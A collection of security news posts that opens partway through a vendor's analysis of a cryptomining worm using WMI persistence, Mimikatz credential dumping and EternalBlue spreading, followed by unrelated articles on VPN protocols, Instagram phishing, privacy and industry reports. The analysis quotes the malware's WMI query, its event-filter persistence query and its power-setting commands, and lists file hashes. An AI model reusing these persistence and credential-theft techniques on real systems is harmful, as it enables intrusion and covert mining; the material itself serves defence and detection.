On execution, it checks whether IP/Domain is alive or not mentioned in the code. If it is available, it requests for banner and receive a response as ‘SCM Event1 Log

Fig. 7 Request for “banner” and another PowerShell Payload

After that malware queries for ‘FilterToConsumerBinding’ WMI Class by executing the below command

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether it contains ‘SCM Event1 Log’. If not present, then it downloads and executes in6.ps1 (64 bit) or in3.ps1 (32 bit) by Invoking Expression(IEX).

 

Fig. 8 Request for powershell script

in6.ps1/in3.ps1:

These scripts consist of two parts, first part is a base64 encoded Gzip data stream and second part contains obfuscated code. After de-obfuscation, the code reassembles similar to initial base64 encoded script with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. ‘mini’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU Miner
  3. ‘funs’ – Collection of functions having function to execute remote DLL via WMI and eternal blue vulnerable scanning.
  4. ‘sc’ – Shellcode to execute on another systems and to download same payload, if it is vulnerable to eternal blue.

It creates a WMI Class “systemcore_Updater0” under the Namespace “root\default” and adds properties like mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets the filtername=”SCM Event1 Log Filter” and consumername=”SCM Event1 Log Consumer”

When attacker uses WMI as a persistence mechanism, instances of __EventFilter,_EventConsumer and __FilterToConsumerBinding have to be created and an _InstanceCreationEvent event is fired.

In this case, attacker uses following query as the EventFilter and binds it with the initial base64 encoded script, which will eventually get executed approximately in every 3 hrs.

SELECT * FROM __InsanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System

Fig 11 Initial PS script hidden in WMI Class

It has tried to delete the task scheduler entry “sysupdater0” also checks “sysupdater0.bat” in %systemroot% , if exists remove that as well.

Modifies Windows sleep, hibernate and power plan setting by invoking the following command:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes all WMI Object in __FilterToConsumerBinding class under Namespace “root\subscription” if filter name has not matched with “SCM Event0 Log”

Then it kills the process if it has an “ESTABLISHED” connection with port number 3333, 5555 or 7777.

It makes a list of PIDs of running “Powershell” processes and the network connections of the system. It then checks for the process with “ESTABLISHED” connection and associated port number 80 or 14444 or 14433 or 443. If no such processes exist and the count of running PowerShell processes are less than 8 then it executes the Monero Miner using “funs” module. After that it executes the mimikatz and dumps the credential irrespective of execution of Monero Miner.

It also enumerates the network addresses and checks for the IPs that are active and adds them to the property named, ‘ipsu’. It then scans those IPs to identify the systems which are vulnerable to MS17-010 (with Eternal Blue Scanner Script), stores them to the property ‘i17’ and finally executes shell code which will download the ze3.ps1 or ze6.ps1 exactly similar to in3.ps1 or in6.ps1 based on OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

Shell code downloads and executes the PS Script to infect other vulnerable systems. This way it spreads and mines the other systems on the networks.

So in both the cases, the open source tools are abused heavily to perform the attack. Mimikatz, masscan, eternal blue vulnerability scanner seems to be popular tools among the malware authors. Similar techniques are being used for spreading the ransomware too. Seqrite successfully detects such attacks at various detection levels.


Indicator of Compromise:

790C213E1227ADEFD2D564217DE86AC9FE660946E1240B5415C55770A951ABFD
46BC86CFF88521671E70EDBBADBC17590305C8F91169F777635E8F529AC21044
AE161E582DE9EC380B3E0B295EFFD62EB8889AC35BC6631A9492CF41563ED14A
0E91F531A05C70B6CF3A8FA942B91A026A5B57069AA5B5C8DFE1EBCBC63AEAE9
EAEF82223EEB8CF404A1D46613D36B9E582304B215201B5E557DB578DD73E04E
30CDBB5C9E23758E8C74E9FDBAEE893D67D3BA42B3B09196CF98395738A67F56
7EC433DD0454553B09F11C39944E251E3EE32E4981F52F02ADC3011EB0CE6537
EA7CEDE3BCB8AD6A8E9FED3CB34F8E6746D445E2044455261EAD4E5092070408
88D338D9FC1990E3D48CDB7E704E785953271EEAB97F196BBCD0C4D2D76F7DC3
789CBE603582262914191882DEC7E6A6F1D61D062D2BDF21B8892BC5854C6196
9868C6F0F23FB81229E2EF765FF524602244384C420D14FFD5708341D85EF4CE
D256AF525680DF6A6178AD608D1700FE5178AA2F3EFE4A52DBCF7AD7EA524936

 

Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

The strengths and weaknesses of different VPN protocols

One in four internet users use a VPN regularly, but how much does the average user know about what goes on behind the software?

Pulling back the curtain, a VPN runs on various VPN protocols that govern the way a VPN client communicates with a VPN server. Different protocols create different ways that connect your device and the internet through encrypted tunnels.

The history of VPN protocols dates back to 1996 when a Microsoft employee came up with Peer-to-Peer Tunneling Protocol (PPTP). The protocol, though not perfect, allowed people to work from home through a secure internet connection.

Since then, VPN protocol technology has evolved and, at the moment, there are five widely used VPN protocols. A breakdown of these five VPN protocols complete with their pros and cons is key to understanding VPN protocols in depth.

VPN

1. PPTP

As noted above, Peer-to-Peer Tunneling Protocol was the first to be developed, and it is over 20 years old. The protocol relies on encryption, authentication and peer-to-peer protocol (PPP) negotiation. In essence, that means it only needs a username, password, and server address to create a connection.

Most devices support PPTP and because of how easy it is to set-up and is rather popular among VPN companies. PPTP is incredibly fast, and as a result, people who want to circumvent geo-restricted content prefer the protocol.

However, the speed comes at the cost of encryption. Of all the protocols, PPTP has the lowest level of encryption. Even Microsoft recommends that people stay away from PPTP because, from a security standpoint where encryption is key, PPTP is extremely unsafe.

That said, if your only concern is speed, then PPTP is the protocol for you.

Pros

  • Super-fast
  • Easy to set up and use
  • Nearly all platforms support the protocol

Cons

2. OpenVPN

First released in 2001, the OpenVPN protocol has become one of the most popular and widely used protocols. It is an open-source protocol which means coders can add to or edit the protocol, scrutinize the source code for vulnerabilities, and solve identified issues immediately.

OpenVPN uses SSL technology, and it is available on nearly all platforms, including Windows, Linux, iOS, Android, macOS, Blackberry, and routers. It operates on both Layer 2 and 3, and it contains extra features that facilitate the transport of IPX packets and Ethernet frames. Moreover, it has NetBIOS functionality and depending on the setup; it can share port 443 with HTTPS.

OpenVPN is incredibly secure thanks to the fact that it uses a 160-bit SHA1 hash algorithm, AES 256-bit key encryption (in addition to others), and 2048-bit RSA authentication.

That said, OpenVPN has a significant weakness—the amount of latency or rather the considerable delay during operation. With the use of more powerful computers and the use of SSL certificates, one can get around this weakness.

Pros

  • Secure
  • Easily bypasses firewalls
  • Supports a variety of cryptographic algorithms
  • It is open-source which means it’s easy to vet
  • Supports Perfect Forward Secrecy

Cons

  • Needs a third-party software for set-up
  • It can be difficult to configure
  • Potentially higher latency periods

3. L2TP/IPsec

To fully understand Layer 2 Tunneling Protocol (L2TP), it is essential first to mention Layer 2 Forwarding (L2F). Cisco developed L2F soon after the release of PPTP to try and improve on the flaws of PPTP. Unfortunately, L2F wasn’t perfect either.

Therefore, in 1999, they concerned released L2TP as an improvement on both PPTP and L2F. L2TP combines the best of both L2F and PPTP to provide a more secure and reliable tunneling protocol.

However, note that L2TP is simply a tunneling protocol and provides neither encryption nor privacy. Due to the lack of encryption, L2TP cannot function as a secure protocol alone and must be paired with IPsec which is a security protocol that carries with it the required encryption. The bundling of L2TP and IPsec protocols leads to the use of something known as double encapsulation.

In double encapsulation, the first encapsulation will create a PPP connection to a remote host and the second encapsulation will contain IPsec.

L2TP supports AES 256 encryption algorithms—some of the most secure—and it prevents man-in-the-middle attacks because data cannot be altered when in transit between the sender and receiver.

Bear in mind that due to the double encapsulation, the protocol has reduced speed. Moreover, the L2TP protocol can only communicate via User Datagram Protocol (UDP). The restriction to UDP means it is easy to block.

Pros

  • Secure according to most
  • Works in almost all platforms
  • Easy to set up
  • Supports multithreading which increases performance

Cons

  • Both Edward Snowden and John Gilmore noted that NSA might have deliberately weakened IPSec which means it can be compromised.
  • Firewalls can easily block it because it only communicates over UDP.
  • Slower than OpenVPN due to double encapsulation

4. SSTP

Secure Socket Tunneling Protocol (SSTP) is very similar to OpenVPN with the only difference being that it is proprietary software that Microsoft developed and introduced in Windows Vista.

Just like OpenVPN, SSTP supports AES 256-bit key encryption, and it uses 2048-bit SSL/TSL certificates for authentication. The protocol has native support for Linux, Windows, and BSD systems. The rest, e.g., Android and iOS only have support via third-party clients.

Pros

  • Provides support for a wide range of cryptographic algorithms
  • Supports Perfect Forward Secrecy
  • Easy to use especially because the protocol is already integrated into Windows

Cons

  • Does not do as well on other systems as it does on Windows
  • It is impossible to audit underlying code because the protocol is proprietary

5. IKEv2

Internet Key Version 2 (IKEv2) is a tunneling protocol that provides a secure key exchange session. The protocol was a collaboration between Microsoft and Cisco. Similar to L2TP, it is often paired with IPsec to provide for authentication and encryption.

IKEv2 is uniquely suited to mobile VPN solutions. That is because it is very good at reconnecting anytime there is a temporary loss of internet connection. Second, it is adept at reconnecting during a network switch (e.g. from mobile data to Wi-Fi).

IKEv2 is not as popular as OpenVPN, PPTP or L2TP/IPsec but a good number of VPNs, especially those that specialize in mobile VPNs use it. Because it is proprietary software, it only has native support for Windows, iOS, and Blackberry.

Pros

  • Extremely stable and does not drop the VPN connection when switching networks
  • Incredibly fast
  • Supports Perfect Forward Secrecy
  • Supports a variety of cryptographic algorithms
  • Easy to set-up

Cons

  • Suffers from the same IPsec drawbacks (NSA tampering)
  • Does not support a considerable number of platforms
  • Firewalls can block the protocol

Summary

From the discussion above; the one clear thing is that no one VPN protocol can satisfy all the user requirements. Some VPN protocols prioritize speed while other prioritize security.

Consequently, it is not a surprise to find a VPN provider that has found a way to incorporate all five in a bid to provide the best possible service.

About the author: Susan Alexandra

Susan Alexandra is is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, you can share the story ideas to susanalexandra67@gmail.com

Pierluigi Paganini

(SecurityAffairs – VPN, privacy)


The post The strengths and weaknesses of different VPN protocols appeared first on Security Affairs.

Best practices when implementing SD-WAN

Telecoms is an overall complex business – delivering network circuits and optimizing connections – but SD-WAN has its own very specific set of obstacles. SD-WAN involves many components that contribute to overall internet network performance such as national policy, security, hardware delivery, installation and cloud applications. Each element can significantly affect a successful SD-WAN transformation. Below, we explore the most common questions that spring up when implementing SD-WAN, and how to make the process as … More

The post Best practices when implementing SD-WAN appeared first on Help Net Security.

Too fast, too insecure: Securing Mongo Express web administrative interfaces

Mongo Express is a lightweight web-based administrative interface deployed to manage MongoDB databases interactively. It is authored using Node.js, Express and Bootstrap packages. This case study highlights the deployment of Mongo Express admin panels without authentication on the Internet and the various measures to prevent the exposure. The authentication scheme Mongo Express comes with a config-default.js file. It primarily supports basic authentication, which encompasses the base64 encoded payload of a username:password combination. This means that, … More

The post Too fast, too insecure: Securing Mongo Express web administrative interfaces appeared first on Help Net Security.

Cybercriminals are becoming more methodical and adaptive

Cybercriminals are deviating towards a more focused approach against targets by using better obfuscation techniques and improved social engineering skills as organizations improve in areas such as time to detection and response to threats, according to Trustwave. The 2019 Trustwave Global Security Report is based on the analysis of billions of logged security and compromise events worldwide, hundreds of hands-on data breach and forensic investigations, manual penetration tests, network vulnerability scans and internal research. Asia … More

The post Cybercriminals are becoming more methodical and adaptive appeared first on Help Net Security.

Something’s Phishy With the Instagram “HotList”

Phishing scams have become incredibly popular these days. Cybercriminals have upped the ante with their tactics, making their phishing messages almost identical to the companies they attempt to spoof. We’ve all heard about phishing emails, SMiShing, and voice phishing, but cybercriminals are turning to social media for their schemes as well. Last week, the “Nasty List” phishing scam plagued Instagram users everywhere, leading victims to fake login pages as a means to steal their credentials. Now, cybercriminals are capitalizing on the success of the “Nasty List” campaign with a new Instagram phishing scam called “The HotList.”

This scam markets itself as a collection of pictures ranked according to attractiveness. Similar to the “Nasty List,” this scheme sends messages to victims through hacked accounts saying that the user has been spotted on this so-called “hot list.” The messages claim to have seen the recipient’s images on the profile @The_HotList_95. If the user goes to the profile and clicks the link in the bio, they are presented with what appears to be a legitimate Instagram login page. Users are tricked into entering their login credentials on the fake login pages, whose URL typically ends in .me domains. Once the cybercriminals acquire the victim’s login, they are able to use their account to further spread the campaign.

Images courtesy of Bleeping Computer. 

Luckily, there are steps users can take to help ensure that their Instagram account stays secure:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. And if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common indicators of a potential scam at play.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in .me.
  • Reset your password. If your account was hacked by “The HotList” but you still have access to your account, reset your password to regain control of your page.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Something’s Phishy With the Instagram “HotList” appeared first on McAfee Blogs.

Oversharing and safety in the age of social media

Many years ago, I worked with healthcare organizations to install infrastructure to support the modernization of their information systems. As I traversed hospitals – both in public and private sectors – I was often struck by one particular best practice: the privacy reminders were ubiquitous. If I stepped into an elevator or walked down a hallway, there was signage to remind everyone about patient privacy. Nothing was left to chance or interpretation. This was also pre-social media, so the concerns ranged from public conversations or inappropriate use of email, to leaving a document on a public printer.

Fast forward to 2019. Our society and culture have changed. We are much freer with our personal information on social media. We talk openly about our lives and post pictures and family information in the wild. We are less concerned about our privacy, as we use these platforms to connect with others – a connection we might be denied given our busy lives. However, as has oft been written, these platforms can be a cache of riches for someone seeking to steal your identity or compromise your email and other accounts. This same type of free flow of information is also following us to other parts of our lives and making it easier for the bad guys to attack and profit. Let me explain with a few examples.

I travel a bit (okay, a lot). While my global travel is mostly for work, this provides an informative world lens for people watching and listening. I am often between flights in an airport reading or catching up on email and overhear a wide variety of conversations – without even trying. Recently, I was in the U.S., delayed at the Chicago O’Hare airport for several hours as “there is (was) weather in Chicago,” the worst phrase in the US travel industry. I overheard a man on the phone discussing his declined credit card in detail, including his full name, billing ZIP code, card number, expiration date, and so on. My shock quickly faded when I started thinking about how many other times I was in public and overheard things that could lead to financial or IP or other loss for an individual or company. The number is non-trivial. That’s when I decided to tweet some simple advice, and solicit input via my twitter feed.

The results were equally horrifying and amusing. Some even thought my post was an attempt in social engineering. Overall, the response convinced me to write a blog as the evidence I gathered suggests this isn’t a small problem. Rather, it’s a real problem. So let me start by sharing some examples and then make some suggestions (which may seem obvious to many of you) on how to protect your privacy and security.

 

So how do you protect yourself from theft of personal or proprietary company information in public? The super obvious, somewhat flippant answer is: don’t share any of this type of information in public. But, at times, this is easier said than done. If you travel as much as I do, it becomes impossible to refrain from conducting some confidential business whilst you are on the road. So how do you actually protect yourself?

Many people will read this blog and say, “well that’s obvious,” but sadly it is not, based on what I have personally observed and the feedback I received in preparation for this post. When in these types of situations, my recommendations are:

  • Use privacy screens on your laptop and your phone when in public, in meetings, and on airplanes. I cannot tell you how much confidential information I could have obtained just sitting behind someone on a plane.
  • Do not discuss confidential information in a public place: restaurant, club, elevator, airplane, etc. Based on the Twitter solicited feedback, people somehow think planes are cones of silence.
  • If you must conduct personal/confidential business on the road, wait until you arrive at your hotel or find a quiet place in the airport/club/restaurant where your back is to a wall and you can see anyone who is located by you. Use your best judgment.
  • Never give anyone your password. I don’t know how to say this more strongly. Do not ever give anyone your password.
  • Use a password manager. Don’t reuse passwords. This way if someone does obtain one of your passwords, you limit your exposure.
  • Be cognizant of what you put on social media. I am very active on social media but, remember, your information can and will be used against you. Be careful of when and how you post to avoid advertising when your home will be vacant for vacation or any personally identifiable information that could expose your passwords.
  • If someone calls you claiming to be from your bank, the IRS, the police, your company, a tech support organization, offer to call them back from a number that is published on their legitimate website or the back of your credit card, etc. Do not give any confidential information to an inbound caller.
  • Use encryption for sensitive data and sensitive communications.
  • If you must install IoT devices at home, segment them to a unique network.
  • If you are renting a private vacation home, there are some very good apps to scan the network to make certain you have privacy (e.g., cameras in a location that was not disclosed by the owner)
  • I am not a fan – at all – of listening devices at home, but if you do have one, remember there is a possibility we will find out all of your conversations were recorded. Be aware of what you say….

The world is quickly evolving as we embrace more technology. The onus is largely on users to protect yourselves. While this blog is just a high-level discussion on social engineering and privacy, using common sense is always your best defense.

 

The post Oversharing and safety in the age of social media appeared first on Microsoft Security.

Trust is Not a Light Switch

We frequently get asked about our competitors and, more specifically, about the security implications of those competitors. Our response always consists of two facts. First, you don’t decide overnight to be trustworthy, transparent and accountable. Second, security, trust, data protection and privacy have been strategic Cisco priorities for many years. We weave them into everything that we do. We’ve been put under the microscope by our customers, media, and the industry. We encourage and embrace that scrutiny. There should be no such thing as implicit trust in today’s world. In fact, we believe the standards should be set higher, not only for Cisco but for all technology providers around the globe, to shift the role from a vendor to a trusted partner.

We have listened to our customers’ cybersecurity priorities and concerns as a guide to help shape our company, all with a goal of being a trusted partner at every step. It is not enough for a vendor to say their products are technically secure or to say their company behaves in a trustworthy way. Vendors must explicitly demonstrate a range of behaviors that prove they are a trusted partner and integrate those behaviors consistently throughout their operations.

Being a trusted partner is not a guarantee that things will never go wrong – no one is perfect. However, it does mean taking precautions to help avoid things from going wrong and acting with integrity when something does go wrong. To further the point, we’d like to share a few things we’ve learned along the way and the actions we have taken to strive for and maintain trusted partner status.

A Secure Development Lifecycle (SDL) is a must do. A SDL is a documented, repeatable, and measurable process to ensure security is built into solutions by design and that security policy is implemented consistently. It ingrains end-to-end integrity across solutions and ensures that security requirements evolve based on the threat landscape. Our SDL has roots back to 2002 and was formally established in 2009. We’ve been through this process for 4,600 releases across more than 400 Cisco product families. We also report our product security metrics to the Cisco Board of Directors. We take it very seriously, with an entire organization dedicated to the proper execution and enforcement of our SDL.

The core of any SDL must consist of secure and consistent coding. From our new developers to our veterans, all levels are tasked with following secure coding standards and best practices that help ensure threat-resistant code and rigorous control of our development environment. In doing this, we know exactly where certain pieces of code are, when and where to patch bugs, and who is ultimately accountable for the security of the code that has been developed. We use Cisco vetted and maintained security modules to reduce security issues, such as excluding known vulnerabilities, while enhancing the engineers’ ability to confidently deploy security features. For example, six years ago we realized how important it was to control encryption related code in our products. Today, CiscoSSL is embedded in over 425 product families we ship today.

Even with a strong SDL, Cisco acquires new technology, consumes software that we don’t develop, and continues to push our own innovation forward. Ultimately, this means bugs and vulnerabilities can still happen. Becoming a trusted partner not only means having a mechanism in place to pinpoint when and where bugs or vulnerabilities pop up – it also means that when you fix them, you fix them in all impacted solutions. This applies to our own and third-party code, and it means transparently disclosing them to all our customers simultaneously when they do. To meet this need, Cisco was one of the first technology companies to address Third-Party Software (TPS) and implement an TPS tracking system for all products we build. For the past ten years, we have continuously improved a system that requires our engineering teams to govern the risks of all TPS used in hardware and software that Cisco distributes. Today, we’re proud to say, a solution cannot ship or go live unless all TPS has been disclosed and all identified security and legal requirements are addressed. In terms of disclosure, we report vulnerabilities found externally and we also report those we find ourselves, internally. Transparency is a critical element in operating as a trusted partner; this is one of the ways we demonstrate the act of transparency to our customers.

Certification and attestation are necessary milestones on the journey to explicit trust. One of the ways we showcase the trustworthiness of our solutions is by achieving global certifications. We work with global governments and regulatory bodies to ensure our solutions meet the latest requirements as well as provide input on how to improve those requirements and help secure the many markets we do business in. In fact, earlier this month one of our cloud services received an attestation report meeting the BSI Cloud Computing Compliance Controls Catalogue (BSI C5). Due to our consistent development process, and aligning our security engineering standards to global standards, we’ve been able to build our solutions to pass multiple verification checkpoints along the way. These verification checkpoints are often necessary, but not sufficient to win the trust of our customers. We often work with customers to validate explicitly, with targeted assessments that go above and beyond these standard checkpoints. This is a critical ‘trust but verify’ step.

The path to earning and maintaining the position of trusted partner is a privilege, and one which never fully ends. Most of these practices take years to fully incorporate into a vendor’s operations. It takes time, investment, the right talent and an overall cultural commitment. Trust is not a light switch you flip on to respond to competition or a media cycle. It takes years to build an organization that systemically thinks about – and implements – Security and Trust with a commitment to continual improvement and company-wide innovation.

We encourage you to be vigilant as you evaluate your vendors. Do not make another ICT purchasing decision without demanding that your vendors prove themselves with explicit trust. Get them to show, not just tell, how they’re incorporating trusted partner elements into every facet of their business.

For more on Cisco Security & Trust news and activities, be sure to visit our Trust Center.

You can’t fix what you can’t see: A new way of looking at network performance

Network performance, or the service quality of a business’ network, is critical to running a successful enterprise. Imagine the cost to an organization when the corporate network or the e-commerce site is down or experiencing unacceptable latency. Customers get frustrated, prospects immediately turn away from purchases, and internally, IT and network admins are in a panic to get systems up and running again, fueled by C-suite pressure. Defining today’s network performance To optimize network performance, … More

The post You can’t fix what you can’t see: A new way of looking at network performance appeared first on Help Net Security.

Employers should develop cybersecurity protocols and invest more in employee training programs

Organizations want to trust their employees when it comes to cybersecurity, but to do so, they need to better leverage technology. The ObserveIT global survey of 600 IT leaders across various industries found that employers should develop clear cybersecurity protocols and invest more in employee training programs and monitoring tools to verify safe user activity. Since 2016, the average number of incidents involving employee or contractor negligence has increased by 26 percent, and by 53 … More

The post Employers should develop cybersecurity protocols and invest more in employee training programs appeared first on Help Net Security.

The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

While many of us were focused on the European Union’s GDPR and California’s Consumer Privacy Act (CCPA), the giant on the other side of the world implemented China’s Cybersecurity Law (CSL) in June 2017. While CSL laid out broad data protection principles, there were noticeable gaps related to implementation and overall scope. To operationalize and further clarify CSL scope, the Chinese government instituted six systems: the Internet Information Content Management System; the Cybersecurity Multi-Level Protection System (MLPS); the Critical Information Infrastructure Security Protection System; the Network Products and Services Management System; the Cybersecurity Incident Management System; and the Personal Information … Continue reading The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

The post The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations appeared first on TrustArc Blog.

Nearly half of firms suffer data breaches at hands of vendors

As trusted partners, third-party vendors often become the overlooked or unwitting accomplice in criminal activities. As privacy laws and cybersecurity regulations continue to increase accountability around data confidentiality and protection, eSentire wanted to know how seriously firms take the risks associated with third-party vendors, and their vendors’ vendors. Earlier this year, eSentire commissioned Spiceworks to survey 600 IT and security decision-makers about their top concerns around their supply chain and the policies or procedures used … More

The post Nearly half of firms suffer data breaches at hands of vendors appeared first on Help Net Security.

What you can expect at HITBSecConf2019 Amsterdam

Taking place across 5 days from the 6th till the 10th of May 2019, HITBSecConf2019 Amsterdam is one of the most prestigious cybersecurity events in Europe. With the event celebrating a decade of excellence, we took this opportunity to sit down with Dhillon Andrew Kannabhiran, the Founder and CEO of Hack in The Box, to talk about this year’s conference. This is the 10th year of HITB Security Conference in Amsterdam! What makes this edition … More

The post What you can expect at HITBSecConf2019 Amsterdam appeared first on Help Net Security.

Research on private key generation reveals theft of ETH funds from accounts with discoverable keys

Researchers at Independent Security Evaluators (ISE) have discovered 732 actively used private keys on the Ethereum blockchain. In their new study titled Ethercombing, ISE found that poorly implemented private key generation is also facilitating the theft of cryptocurrency. Example flow of deriving an Ethereum address from a private key The researchers identified 13,319 Ether (ETH) which was transferred to both invalid destination addresses and forever lost, as well as to wallets derived from weak private … More

The post Research on private key generation reveals theft of ETH funds from accounts with discoverable keys appeared first on Help Net Security.

Emerging Cybersecurity Threats Affecting Online Retailers

Online retailers are amongst the most favorite of targets for all hackers, the simple reason being that retailers process customer data in large number on a day-to-day basis. Another reason is that many retailers, especially smaller companies, don’t take necessary steps to protect themselves from cybercriminals and hence it becomes easy for attackers to target and attack them.

It is a widely known fact that hackers today target not just the big companies; they are after smaller ones as well. Big companies might have the resources to combat cyberattacks and to bounce back into business, even after massive breaches. Smaller businesses have to keep in mind that they might not have the resources- especially the money- that’s needed to bounce back into business after major cybersecurity breaches. The damages caused by such a big attack could send them totally out of business. Thus, it would be best to understand the cybersecurity risks that retailers, both big and small, could face and take steps to counter and mitigate them. Here’s a look at the emerging cybersecurity threats that affect online retailers today…

Supply chain attacks – No direct access to retailers’ systems needed!

Supply chain attacks take place when attackers breach the security of third-party connections that have something to do with retailers, especially peers and companies that facilitate operations for the retailers. Such attacks could ultimately lead to data breaches for the retailers themselves. Thus, an attacker who breaches the security of the suppliers associated with a retail company could, without accessing the retailer’s systems, get access to data associated with the retailer’s business. Similarly, by breaching systems of a shipping company or the online SaaS products integrated with a retailer’s business, hackers can get access to data pertaining to the retailer. Partners and clients of online retailers would be having direct access to the retailers’ core systems and thus by breaching and gaining access to the networks of these partners and clients, hackers could ultimately get access to retailers’ networks as well. Hence, by carrying out supply chain attacks targeting partners, clients, business associates, suppliers etc with vulnerable systems and networks, hackers can cause great damages to online retailers. This proves that it is of utmost importance that online retailers always stay vigilant as regards choosing app integrations and also that they should avoid connecting with businesses that have poor cybersecurity practices in place.

Ransomware attacks – Widespread and devastating!

Ransomware attacks have become widespread in recent times, especially in the last couple of years. Online retailers are among the worst hit as regards ransomware strikes happening all across the world. This is because a ransomware attack, which involves the encryption of all data in targeted systems and networks, could result in any retailer being rendered unable to access all the data that’s stored in their systems. Retailers store lots of customer data and when such data becomes inaccessible and unusable, all business activities are thrown out of gear. The only way out, especially for those businesses who do not have a backup of their data, would be to pay the ransom that the cybercriminals demand for de-encrypting the data. For many small businesses, paying the ransom wouldn’t be that easy. Moreover, there have been instances when despite paying the ransom, the hackers wouldn’t de-encrypt the encrypted data. Hence, the best solution would be to practice good internet hygiene, with special importance being given to protecting the network against phishing attacks, and also to ensure that there is always a properly updated back up of all important and sensitive data.

Return and refund frauds – Quite common!

Return and refund frauds have become quite common these days. There are instances when fake receipts are used to get refunds on products that were never purchased. There are also instances when hackers order goods using stolen credit cards or breached card/banking data and then request a refund to be processed through another card or account. In some other cases, some people order and collect goods, and then file complaints claiming that their order was never shipped. Such return and refund frauds are quite common these days. Most reputable retailers today have a return and refund policy. Since the criminals come up with all kinds of innovative techniques to do such frauds, the best thing that any online retailer can do is to keep updated as regards the return and refund fraud landscape and take sufficient steps to protect themselves against such frauds.

Exploiting IoT vulnerabilities- An emerging trend!

With more and more IoT (Internet of Things) devices being used at different stages of the retail business, exploiting IoT vulnerabilities is now an emerging trend. Retailers use IoT devices in the different stages of the supply chain- in tracking supplies, in monitoring warehouses, in sorting and restocking supplies etc. They also use IoT devices to automate tasks at the stores. But many retailers today ignore the security aspect of these IoT devices and as a result, they get targeted by hackers. Hackers can, through an IoT attack on the supply chain, reroute all supplies for a retailer to some other location and thus cause great damages to the retailer. IoT vulnerabilities can also be exploited by a hacker to breach an online retailer’s business network and steal sensitive data from the network. Hence all businesses in the retail sector should invariably make it a point to secure all IoT devices that they use and keep all hardware/software updated with latest security patches.

Account Takeover (ATO) frauds- Causing reputation damage!

Hackers might make orders using stolen account credentials and then change the shipping location so that the order gets delivered into the hands of the hacker and not to the account holder. Since such accounts would mostly be registered with the retailer, the hacker’s activity would be seen only as normal customer activity. Trouble starts when the customer notices the purchases, mostly at a later stage and then reports it. The retailer might have to refund the lost money to the customer and there are almost zero chances of recovering the stolen goods. Such frauds and the costs involved might not affect the business financially beyond an extent, but it would certainly cause reputation damage, which eventually could impact the business in a negative manner. Customer trust, as we all know, is important for any online retailer and ATO frauds impact customer trust in a negative way. To protect themselves from ATO frauds, retailers can make necessary varying degrees of authentication before any purchase is made. This could make it somewhat difficult for hackers to carry out ATO frauds.

Related Resources:

Rise in Cyberattacks calls for a rise in Cyber Awareness

Cybersecurity Breaches Against Canadian Companies

Vacuum Cleaner Vulnerabilities Are The New IoT Nightmare

The post Emerging Cybersecurity Threats Affecting Online Retailers appeared first on .

The foundation: Quantifying risk with focused security measurement

When you hear “quantify risk,” you might think it’s the buzz-term du jour. You might be right. Risk quantification is a hot topic right now. It seems everyone who touches security – from the C-suite to the board – has this at the forefront of their mind. As a security leader, you’re likely being asked about quantifying risk, perhaps more so now than ever before. You might be pressed to answer with much confidence. When … More

The post The foundation: Quantifying risk with focused security measurement appeared first on Help Net Security.

Attackers are weaponizing more vulnerabilities than ever before

2018 had the most weaponized vulnerabilities ever (177), which represents a 139% increase compared to 2017, according to the RiskSense latest report. In addition, the rate of exploits discovered in the wild before a patch was available was nearly three times higher last year than the previous record set in 2010. The RiskSense Vulnerability Weaponization Insights Report provides an in-depth analysis of vulnerabilities and weaponization patterns across the Adobe family of products from August 1996 … More

The post Attackers are weaponizing more vulnerabilities than ever before appeared first on Help Net Security.

Scientists may have identified a new way to improve network security

With cybersecurity one of the nation’s top security concerns and billions of people affected by breaches last year, government and businesses are spending more time and money defending against it. Researchers at the U.S. Army Combat Capabilities Development Command’s Army Research Laboratory, the Army’s corporate research laboratory also known as ARL, and Towson University may have identified a new way to improve network security. Many cybersecurity systems use distributed network intrusion detection that allows a … More

The post Scientists may have identified a new way to improve network security appeared first on Help Net Security.

As bad bots grow more sophisticated, so does the number of industries impacted by them

Bot attack sophistication continues to evolve, as advanced attackers learn to adapt their techniques in order to invalidate existing defense tactics, according to Distil Networks. The report investigates hundreds of billions of bad bot requests from 2018 over thousands of domains to provide deeper insight into the daily automated attacks wreaking havoc on websites, mobile apps and APIs. “Bot operators and bot defenders are playing an incessant game of cat and mouse, and techniques used … More

The post As bad bots grow more sophisticated, so does the number of industries impacted by them appeared first on Help Net Security.

The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login

How often do you check your social media accounts? According to a recent study, internet users spend an average of 2 hours and 22 minutes per day on social networking platforms. Since users are pretty reliant on social media, cybercriminals use it as an avenue to target victims with various cyberattacks. The latest social media scheme called “The Nasty List” scams users into giving up their Instagram credentials and uses their accounts to further promote the phishing scam.

